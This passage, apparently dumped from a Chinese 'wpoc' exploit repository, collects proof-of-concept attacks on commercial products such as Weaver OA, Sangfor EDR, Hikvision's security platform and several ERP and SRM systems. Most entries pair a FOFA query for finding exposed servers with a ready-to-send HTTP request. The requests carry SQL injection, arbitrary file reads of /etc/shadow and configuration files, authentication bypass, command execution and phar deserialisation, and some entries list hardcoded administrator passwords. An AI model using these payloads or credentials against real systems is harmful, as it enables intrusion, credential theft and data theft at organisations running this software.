13 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
14 | Accept-Encoding: gzip
15 | Connection: close
16 | ```
17 |
18 | 
19 |
20 |
--------------------------------------------------------------------------------
/wpoc/懒人网址导航页/懒人网址导航页search.html存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 懒人网址导航页search.html存在SQL注入漏洞
2 |
3 |
4 |
5 | ## fofa
6 |
7 | ```
8 | body="./templates/antidote/css/style.css"
9 | ```
10 |
11 |
12 |
13 | ## poc
14 |
15 | ```
16 | GET /search.html?keyword='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x2d2d2d2d2d,version(),0x2d2d2d2d2d),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1
17 | Host: your-ip
18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
19 | Connection: keep-alive
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/wpoc/成都索贝数码科技/索贝融媒体存在硬编码漏洞.md:
--------------------------------------------------------------------------------
1 | # 索贝融媒体存在硬编码漏洞
2 |
3 | 索贝融媒体存在硬编码漏洞,导致默认密码泄露造成的后台管理系统的非法利用。
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | body="/Sc-TaskMonitoring/" || header="Sobey"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | sobey/sobey
15 | sobey/Sobeyhive-2016
16 | ```
17 |
18 | 
--------------------------------------------------------------------------------
/wpoc/挖矿质押单语言系统/某U挖矿质押单语言系统前台未授权修改管理员密码.md:
--------------------------------------------------------------------------------
1 | # 某U挖矿质押单语言系统前台未授权修改管理员密码
2 |
3 | 位于 /admin/controller/Login.php 有个很明显操纵SQL的update操作,重置了管理员的密码为123456,且未设置鉴权,非常明显是个后门
4 |
5 | ## fofa
6 |
7 | ```java
8 | "/static/index/css/login/framework7.ios.min.css"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | /admin/login/setpassword
15 | ```
16 |
17 | 
18 |
19 |
20 |
21 | ## 漏洞来源
22 |
23 | - https://mp.weixin.qq.com/s/EL-1pxjTNUS5fAKVX1zlrQ
--------------------------------------------------------------------------------
/wpoc/挖矿质押单语言系统/某U挖矿质押单语言系统后台phar反序列漏洞.md:
--------------------------------------------------------------------------------
1 | # 某U挖矿质押单语言系统后台phar反序列漏洞
2 |
3 | **位于 /admin/controller/Cache.php 控制器的 deldir 方法存在file_exists 函数,该函数可以直接导致Phar反序列化漏洞触发**
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | "/static/index/css/login/framework7.ios.min.css"
9 | ```
10 |
11 | ## poc
12 |
13 | 首先我们需要用phpggc生成一个绕过图片检测的phar反序列化脚本,用一张正常图片即可
14 |
15 | ```
16 | ./phpggc -pj 123.jpg -o evil.jpg ThinkPHP/RCE2 system whoami
17 | ```
18 |
19 | ```
20 | /admin/cache/deldir?backup_file=phar://图片地址
21 | ```
22 |
23 | 
--------------------------------------------------------------------------------
/wpoc/方正全媒体/方正全媒体采编系统存在syn.do信息泄露漏洞.md:
--------------------------------------------------------------------------------
1 | # 方正全媒体采编系统存在syn.do信息泄露漏洞
2 |
3 | 方正全媒体采编系统存在syn.do信息泄露漏洞,攻击者可以查看到平台中所有用户的用户名。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="FOUNDER-全媒体采编系统"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | GET /newsedit/assess/syn.do?type=org HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
17 | Content-Length: 185Accept: */*
18 | Accept-Encoding: gzip, deflate
19 | Connection: close
20 | ```
21 |
22 | 
--------------------------------------------------------------------------------
/wpoc/时空物流运输管理系统/时空物流运输管理系统存在敏感信息泄露漏洞.md:
--------------------------------------------------------------------------------
1 | # 时空物流运输管理系统存在敏感信息泄露漏洞
2 | 时空物流运输管理系统存在敏感信息泄露漏洞
3 |
4 | ## fofa
5 | ```rust
6 | body="/Images/ManLogin/name.png"
7 | ```
8 |
9 | 
10 |
11 | ## poc
12 | ```rust
13 | /ManLogin/SysData
14 | ```
15 |
16 | 
17 |
18 |
--------------------------------------------------------------------------------
/wpoc/易宝OA/易宝OA ExecuteSqlForSingle SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 易宝OA ExecuteSqlForSingle SQL注入漏洞
2 |
3 | ## fofa
4 | ```
5 | "顶讯科技"
6 | ```
7 |
8 | ## poc
9 | ```
10 | POST /api/system/ExecuteSqlForSingle HTTP/1.1
11 | Host: IP:PORT
12 | Content-Type: application/x-www-form-urlencoded
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
14 | Content-Length: 103
15 |
16 | token=zxh&sql=select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)&strParameters
17 | ```
18 | 发送poc 在返回包中存在 `e10adc3949ba59abbe56e057f20f883e` 字符为存在漏洞
19 |
20 |
--------------------------------------------------------------------------------
/wpoc/易宝OA/易宝OA-ExecuteSqlForSingle-SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 易宝OA ExecuteSqlForSingle SQL注入漏洞
2 |
3 | ## fofa
4 | ```
5 | "顶讯科技"
6 | ```
7 |
8 | ## poc
9 | ```
10 | POST /api/system/ExecuteSqlForSingle HTTP/1.1
11 | Host: IP:PORT
12 | Content-Type: application/x-www-form-urlencoded
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
14 | Content-Length: 103
15 |
16 | token=zxh&sql=select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)&strParameters
17 | ```
18 | 发送poc 在返回包中存在 `e10adc3949ba59abbe56e057f20f883e` 字符为存在漏洞
19 |
20 |
--------------------------------------------------------------------------------
/wpoc/易宝OA/易宝OA系统DownloadFile接口存在文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 易宝OA系统DownloadFile接口存在文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | "顶讯科技"
6 | ```
7 |
8 | ## poc
9 | ```
10 | POST /api/files/DownloadFile HTTP/1.1
11 | Host:
12 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
13 | Content-Length: 94
14 | Accept-Encoding: gzip
15 | Content-Type: application/x-www-form-urlencoded
16 |
17 | token=zxh&requestFileName=../../manager/web.config&pathType=1&startPosition=0&bufferSize=1000
18 | ```
19 |
--------------------------------------------------------------------------------
/wpoc/易思智能物流无人值守系统/易思智能物流无人值守系统DownFile任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # 易思智能物流无人值守系统DownFile任意文件读取漏洞
2 |
3 | 易思智能物流无人值守系统DownFile任意文件读取漏洞
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | body="/api/SingleLogin"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | GET /PublicInfoManage/Upload/DownFile?filePath=web.config HTTP/1.0
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
17 | Content-Type: application/x-www-form-urlencoded
18 | Connection: close
19 | ```
20 |
21 | 
--------------------------------------------------------------------------------
/wpoc/智互联科技有限公司/智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # 智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞
2 |
3 | 智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | title=="SRM 2.0"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | GET /adpweb/static/%2e%2e;/a/sys/runtimeLog/download?path=c:\\windows\win.ini HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
17 | ```
18 |
19 | 
20 |
--------------------------------------------------------------------------------
/wpoc/智互联科技有限公司/智联云采SRM2.0系统接口autologin身份认证绕过漏洞.md:
--------------------------------------------------------------------------------
1 | # 智联云采SRM2.0系统接口autologin身份认证绕过漏洞
2 |
3 | 由于智联云采 SRM2.0 autologin 接口代码逻辑存在缺陷,导致未授权的攻击者可以构造特殊绕过身份认证直接以管理员身份接管后台,造成信息泄露,使系统处于极不安全的状态。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | title=="SRM 2.0"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | GET /adpweb/static/..;/api/sys/app/autologin?loginName=admin HTTP/1.1
15 | Host:
16 | ```
17 |
18 | 
19 |
20 | 
--------------------------------------------------------------------------------
/wpoc/智跃人力资源管理系统/智跃人力资源管理系统GenerateEntityFromTable.aspx SQL漏洞.md:
--------------------------------------------------------------------------------
1 | ## 智跃人力资源管理系统GenerateEntityFromTable.aspx SQL漏洞
2 |
3 | ## fofa
4 | ```
5 | app="ZY-人力资源管理系统"
6 | ```
7 |
8 | ## poc
9 | ```
10 | http://127.0.0.1:8085/resource/utils/GenerateEntityFromTable.aspx?t=1%27%2B(SELECT%20CHAR(103)%2BCHAR(87)%2BCHAR(114)%2BCHAR(112)%20WHERE%201669%3D1669%20AND%206492%20IN%20(select+@@version))%2B%27
11 | ```
12 |
13 |
--------------------------------------------------------------------------------
/wpoc/智跃人力资源管理系统/智跃人力资源管理系统GenerateEntityFromTable.aspx-SQL漏洞.md:
--------------------------------------------------------------------------------
1 | ## 智跃人力资源管理系统GenerateEntityFromTable.aspx SQL漏洞
2 |
3 | ## fofa
4 | ```
5 | app="ZY-人力资源管理系统"
6 | ```
7 |
8 | ## poc
9 | ```
10 | http://127.0.0.1:8085/resource/utils/GenerateEntityFromTable.aspx?t=1%27%2B(SELECT%20CHAR(103)%2BCHAR(87)%2BCHAR(114)%2BCHAR(112)%20WHERE%201669%3D1669%20AND%206492%20IN%20(select+@@version))%2B%27
11 | ```
12 |
13 |
--------------------------------------------------------------------------------
/wpoc/杜特网/杜特网上订单管理系统Login.ashx存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 杜特网上订单管理系统Login.ashx存在SQL注入漏洞
2 |
3 | 杜特网上订单管理系统Login.ashx存在SQL注入漏洞
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | app="TUTORSOFT-ERP"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | POST /ajax/Login.ashx HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
17 | Accept-Encoding: gzip, deflate
18 | Accept-Language: zh-CN,zh;q=0.9
19 | Connection: close
20 | Content-Type: application/x-www-form-urlencoded
21 |
22 | LoginCode=1';WAITFOR+DELAY+'0:0:5'--&Password=1&ckRemember=0
23 | ```
24 |
25 |
--------------------------------------------------------------------------------
/wpoc/杭州三一谦成科技车辆监控服务平台/杭州三一谦成科技车辆监控服务平台接口platformSql存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 杭州三一谦成科技车辆监控服务平台接口platformSql存在SQL注入漏洞
2 |
3 | 杭州三一谦成科技车辆监控服务平台接口 /gps-web/platformSql 存在SQL 注入漏洞
4 |
5 |
6 |
7 | ## poc
8 |
9 | ```java
10 | POST /gps-web/platformSql HTTP/1.1
11 | Host:
12 | User-Agent: python-requests/2.28.1
13 | Accept-Encoding: gzip, deflate
14 | Accept: */* Connection: keep-alive
15 | Content-Type: application/x-www-form-urlencoded
16 | Content-Length: 74
17 |
18 | action=EXEC_SQL¶ms=SELECT schema_name FROM information_schema.schemata
19 | ```
20 |
21 |
--------------------------------------------------------------------------------
/wpoc/极限OA/极限OA接口video_file.php存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 极限OA接口video_file.php存在任意文件读取漏洞
2 |
3 | 极限OA video_file.php 处存在任意文件读取,攻击者可以从其中获取网站路径和数据库账号密码等敏感信息进一步攻击。
4 |
5 | ## poc
6 |
7 | ```
8 | /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
9 | ```
10 |
11 | 
--------------------------------------------------------------------------------
/wpoc/汉得SRM/汉得SRM tomcat.jsp 登录绕过漏洞.md:
--------------------------------------------------------------------------------
1 | ## 汉得SRM tomcat.jsp 登录绕过漏洞
2 | ```
3 | /tomcat.jsp?dataName=role_id&dataValue=1
4 | /tomcat.jsp?dataName=user_id&dataValue=1
5 | ```
6 | 然后访问后台:/main.screen
7 |
--------------------------------------------------------------------------------
/wpoc/汉得SRM/汉得SRM-tomcat.jsp-登录绕过漏洞.md:
--------------------------------------------------------------------------------
1 | ## 汉得SRM tomcat.jsp 登录绕过漏洞
2 | ```
3 | /tomcat.jsp?dataName=role_id&dataValue=1
4 | /tomcat.jsp?dataName=user_id&dataValue=1
5 | ```
6 | 然后访问后台:/main.screen
7 |
--------------------------------------------------------------------------------
/wpoc/泛微OA/泛微 HrmCareerApplyPerView sql注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 泛微 HrmCareerApplyPerView sql注入漏洞
2 | ```
3 | GET
4 | /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(db_name()),db_name(1),5,6,7 HTTP/1.1
5 | Host: 127.0.0.1:7443
6 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)
7 | Accept-Encoding: gzip, deflate
8 | Connection: close
9 |
10 | ```
11 |
--------------------------------------------------------------------------------
/wpoc/泛微OA/泛微-EMobile存在弱口令漏洞.md:
--------------------------------------------------------------------------------
1 | ## 泛微-EMobile存在弱口令漏洞
2 |
3 | ## fofa
4 | ```
5 | app="泛微-EMobile"
6 | ```
7 |
8 |
9 | ## 弱口令:
10 | ```
11 | sysadmin/Weaver#2012!@#
12 | sysadmin/Weaver@2001
13 | ```
14 |
--------------------------------------------------------------------------------
/wpoc/泛微OA/泛微-HrmCareerApplyPerView-sql注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 泛微 HrmCareerApplyPerView sql注入漏洞
2 | ```
3 | GET
4 | /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(db_name()),db_name(1),5,6,7 HTTP/1.1
5 | Host: 127.0.0.1:7443
6 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)
7 | Accept-Encoding: gzip, deflate
8 | Connection: close
9 |
10 | ```
11 |
--------------------------------------------------------------------------------
/wpoc/泛微OA/泛微-OA系统ResourceServlet接口任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 泛微-OA系统ResourceServlet接口任意文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | app="泛微-OA(e-cology)"
6 | ```
7 |
8 | ## poc
9 | ```
10 | GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties HTTP/1.1
11 | ```
12 |
--------------------------------------------------------------------------------
/wpoc/泛微OA/泛微E-Cology系统接口deleteRequestInfoByXml存在XXE漏洞.md:
--------------------------------------------------------------------------------
1 | # 泛微E-Cology系统接口deleteRequestInfoByXml存在XXE漏洞
2 |
3 | 泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology系统接口`/rest/ofs/deleteRequestInfoByXml` 存在XXE漏洞
4 |
5 | ## fofa
6 |
7 | ```java
8 | app="泛微-协同商务系统"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | POST /rest/ofs/deleteRequestInfoByXml HTTP/1.1
15 | Host:
16 | Content-Type: application/xml
17 | Content-Length: 131
18 |
19 |
20 |
21 | &send;
22 | ```
23 |
24 |
--------------------------------------------------------------------------------
/wpoc/泛微OA/泛微E-Mobile硬编码口令漏洞(XVE-2024-28095).md:
--------------------------------------------------------------------------------
1 | # 泛微E-Mobile硬编码口令漏洞(XVE-2024-28095)
2 |
3 | 泛微E-Mobile 存在硬编码口令漏洞,未经身份验证的远程攻击者可利用该口令以超级管理员身份登录管理后台,导致网站处于极度不安全状态。
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | app="泛微-EMobile"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | 账号:msgadmin
15 | 密码:Weaver#2012!@#
16 | ```
17 |
18 | 
19 |
20 |
--------------------------------------------------------------------------------
/wpoc/泛微OA/泛微E-Office系统login_other.php存在sql注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 泛微E-Office系统login_other.php存在sql注入漏洞
2 |
3 | 泛微E-Office系统/E-mobile/Data/login_other.php?diff=sync&auth=存在sql注入漏洞
4 |
5 | ## fofa
6 |
7 | ```
8 | app="泛微-EOffice"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | /E-mobile/Data/login_other.php?diff=sync&auth={"auths":[{"value":"-1' UNION SELECT 1,2,md5(123456),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23"}]}
15 | ```
16 |
17 | 
--------------------------------------------------------------------------------
/wpoc/泛微OA/泛微OA-E-Cology-FileDownload文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 泛微OA-E-Cology-FileDownload文件读取漏洞
2 |
3 |
4 | ## fofa
5 | ```
6 | app="泛微-OA(e-cology)"
7 | ```
8 |
9 | ## poc
10 | ```
11 | GET /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/prop/weaver.properties HTTP/1.1
12 | Host:
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
14 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
15 | Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
16 | Accept-Encoding: gzip, deflate
17 | Connection: close
18 | Upgrade-Insecure-Requests: 1
19 | ```
20 |
--------------------------------------------------------------------------------
/wpoc/泛微OA/泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞
2 |
3 | 泛微OA E-Cology是一款面向中大型组织的数字化办公产品,它基于全新的设计理念和管理思想,旨在为中大型组织创建一个全新的高效协同办公环境。泛微OA E-Cology Getdata.jsp存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。
4 |
5 | ## fofa
6 |
7 | ```
8 | app="泛微-OA(e-cology)"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | http://{{Hostname}}/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
15 | ```
16 |
17 | 
--------------------------------------------------------------------------------
/wpoc/泛微OA/泛微OA-E-cology8-SptmForPortalThumbnail.jsp任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 泛微OA-E-cology8-SptmForPortalThumbnail.jsp任意文件读取漏洞
2 |
3 | 泛微 e-cology8 的 SptmForPortalThumbnail.jsp 文件中的 preview 未进行安全过滤,攻击者可通过该漏洞读取泄露源码、数据库配置文件等等,导致网站处于极度不安全状态。
4 |
5 | ## fofa
6 |
7 | ```
8 | app="泛微-OA(e-cology)"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | /portal/SptmForPortalThumbnail.jsp?preview=../ecology/WEB-INF/prop/weaver.properties
15 | ```
16 |
17 | 
--------------------------------------------------------------------------------
/wpoc/泛微OA/泛微e-office系统UserSelect接口存在未授权访问漏洞.md:
--------------------------------------------------------------------------------
1 | ## 泛微e-office系统UserSelect接口存在未授权访问漏洞
2 |
3 | ## fofa
4 | ```
5 | app="泛微-EOffice"
6 | ```
7 |
8 |
9 | ## poc
10 | ```
11 | http://127.0.0.1/UserSelect/
12 | ```
13 |
14 | 
15 |
--------------------------------------------------------------------------------
/wpoc/泛微OA/泛微ecology系统setup接口存在信息泄露漏洞.md:
--------------------------------------------------------------------------------
1 | # 泛微ecology系统setup接口存在信息泄露漏洞
2 |
3 |
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | app="泛微-协同办公OA"
9 | ```
10 |
11 | ## poc
12 |
13 | ```yaml
14 | GET /cloudstore/ecode/setup/ecology_dev.zip HTTP/1.1
15 | Host: {{Hostname}}
16 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
17 | ```
18 |
19 |
--------------------------------------------------------------------------------
/wpoc/浙大恩特客户资源管理系统/浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入.md:
--------------------------------------------------------------------------------
1 | ## 浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入
2 |
3 | ## poc
4 | ```
5 | /entsoft/RegulatePriceAction.entsoft;.js?method=getRegulatePricedlist®ulatepcnum=1'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,111*111--+aaaa
6 |
7 | ```
8 |
--------------------------------------------------------------------------------
/wpoc/海康威视/海康威视综合安防download存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 海康威视综合安防download存在任意文件读取漏洞
2 |
3 | 综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备。海康威视集成化综合管理软件平台,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度。Hikvision综合安防管理平台/orgManage/v1/orgs/download接口存在任意文件读取漏洞。
4 |
5 | ## fofa
6 |
7 | ```
8 | title="综合安防管理平台"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
17 | ```
18 |
19 |
--------------------------------------------------------------------------------
/wpoc/海康威视/海康威视综合安防管理平台信息泄露.md:
--------------------------------------------------------------------------------
1 |
2 | ## 海康威视综合安防管理平台信息泄露
3 |
4 | HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,海康威视综合安防管理平台信息存在信息泄露(内网集权账户密码)漏洞,可以通过解密软件,解密用户名密码。
5 |
6 | ## fofa
7 | ```
8 | app="HIKVISION-综合安防管理平台"
9 | ```
10 |
11 | ## hunter
12 | ```
13 | web.title="综合安防管理平台"
14 | ```
15 |
16 | ## poc
17 | ```
18 | /portal/conf/config.properties
19 |
20 | ```
21 | ## 漏洞复现
22 | 
23 |
--------------------------------------------------------------------------------
/wpoc/海翔ERP/海翔ERP SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 海翔ERP SQL注入漏洞
2 |
3 | 海翔ERP存在SQL注入漏洞,由于系统未对用户输入的内容进行过滤,攻击者可以通过/getylist_login.do路由进行SQL注入,从而获取数据库中的敏感信息。
4 |
5 |
6 | ## poc
7 | ```
8 | POST /getylist_login.do HTTP/1.1
9 | Host: xxx.xxx.xxx.xxx
10 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
11 | Connection: close
12 | Content-Length: 77
13 | Accept-Encoding: gzip
14 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8
15 |
16 | accountname=test' and (updatexml(1,concat(0x7e,(select md5(123)),0x7e),1));--
17 | ```
18 |
19 |
--------------------------------------------------------------------------------
/wpoc/海翔ERP/海翔ERP-SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 海翔ERP SQL注入漏洞
2 |
3 | 海翔ERP存在SQL注入漏洞,由于系统未对用户输入的内容进行过滤,攻击者可以通过/getylist_login.do路由进行SQL注入,从而获取数据库中的敏感信息。
4 |
5 |
6 | ## poc
7 | ```
8 | POST /getylist_login.do HTTP/1.1
9 | Host: xxx.xxx.xxx.xxx
10 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
11 | Connection: close
12 | Content-Length: 77
13 | Accept-Encoding: gzip
14 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8
15 |
16 | accountname=test' and (updatexml(1,concat(0x7e,(select md5(123)),0x7e),1));--
17 | ```
18 |
19 |
--------------------------------------------------------------------------------
/wpoc/润乾报表/润乾报表平台InputServlet存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 润乾报表平台InputServlet存在任意文件读取漏洞
2 |
3 |
4 | ## poc
5 | ```
6 | POST /InputServlet?action=13 HTTP/1.1
7 | Host:
8 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
9 | Content-Type: application/x-www-form-urlencoded
10 | Connection: close
11 |
12 | file=%2F%5C..%5C%5C..%5C%5CWEB-INF%5C%5CraqsoftConfig.xml&upFileName=web.config
13 |
14 | ```
15 |
--------------------------------------------------------------------------------
/wpoc/润申信息科技ERP系统/润申信息科技ERP系统CommentStandardHandler.ashx接口存在sql注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 润申信息科技ERP系统CommentStandardHandler.ashx接口存在sql注入漏洞
2 |
3 |
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | body="PDCA/js/_publicCom.js"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 |
15 | POST /PDCA/ashx/CommentStandardHandler.ashx HTTP/1.1
16 | Host:
17 | Content-Type: application/x-www-form-urlencoded
18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
19 |
20 | action=detailInfo&fileid=1+and+%01(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123')),3,32))<0--
21 | ```
22 |
23 |
--------------------------------------------------------------------------------
/wpoc/深信服/某x服应用交付系统命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | ## 某x服应用交付系统命令执行漏洞
2 | ```
3 | POST /rep/login
4 | Host:127.0.0.1:85
5 |
6 | clsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
7 | ```
8 |
--------------------------------------------------------------------------------
/wpoc/深信服/深信服SANGFOR终端检测响应平台 - 任意用户免密登录,前台RCE.md:
--------------------------------------------------------------------------------
1 | ## SANGFOR终端检测响应平台 - 任意用户免密登录,前台RCE
2 |
3 | ## FOFA语法
4 | ```
5 | title="SANGFOR终端检测响应平台"
6 | icon_hash="1307354852"
7 | ```
8 | ## 鹰图搜索
9 | ```
10 | web.title="SANGFOR终端检测响应平台"
11 | web.icon=="68e28d49856759ddeb91b6be3d6f7e42"
12 | ```
13 |
14 | ## 漏洞复现
15 | 路由后拼接/ui/login.php?user={{需要登录的用户名}}
16 |
17 | 这边以admin权限用户为例
18 | ```
19 | GET /ui/login.php?user=admin HTTP/1.1
20 |
21 | Host: {{Hostname}}
22 | ```
23 |
24 | ## 前台RCE
25 | ```
26 | GET /tool/log/c.php?strip_slashes=system&host=id HTTP/1.1
27 |
28 | Host: {{Hostname}}
29 | ```
30 |
--------------------------------------------------------------------------------
/wpoc/深信服/深信服SANGFOR终端检测响应平台---任意用户免密登录,前台RCE.md:
--------------------------------------------------------------------------------
1 | ## SANGFOR终端检测响应平台 - 任意用户免密登录,前台RCE
2 |
3 | ## FOFA语法
4 | ```
5 | title="SANGFOR终端检测响应平台"
6 | icon_hash="1307354852"
7 | ```
8 | ## 鹰图搜索
9 | ```
10 | web.title="SANGFOR终端检测响应平台"
11 | web.icon=="68e28d49856759ddeb91b6be3d6f7e42"
12 | ```
13 |
14 | ## 漏洞复现
15 | 路由后拼接/ui/login.php?user={{需要登录的用户名}}
16 |
17 | 这边以admin权限用户为例
18 | ```
19 | GET /ui/login.php?user=admin HTTP/1.1
20 |
21 | Host: {{Hostname}}
22 | ```
23 |
24 | ## 前台RCE
25 | ```
26 | GET /tool/log/c.php?strip_slashes=system&host=id HTTP/1.1
27 |
28 | Host: {{Hostname}}
29 | ```
30 |
--------------------------------------------------------------------------------
/wpoc/深信服/深信服SG上网优化管理系统 catjs.php 任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 深信服SG上网优化管理系统 catjs.php 任意文件读取漏洞
2 | ```
3 | POST /php/catjs.php
4 |
5 | [" ../../../../../../etc/shadow"]
6 | ```
7 |
--------------------------------------------------------------------------------
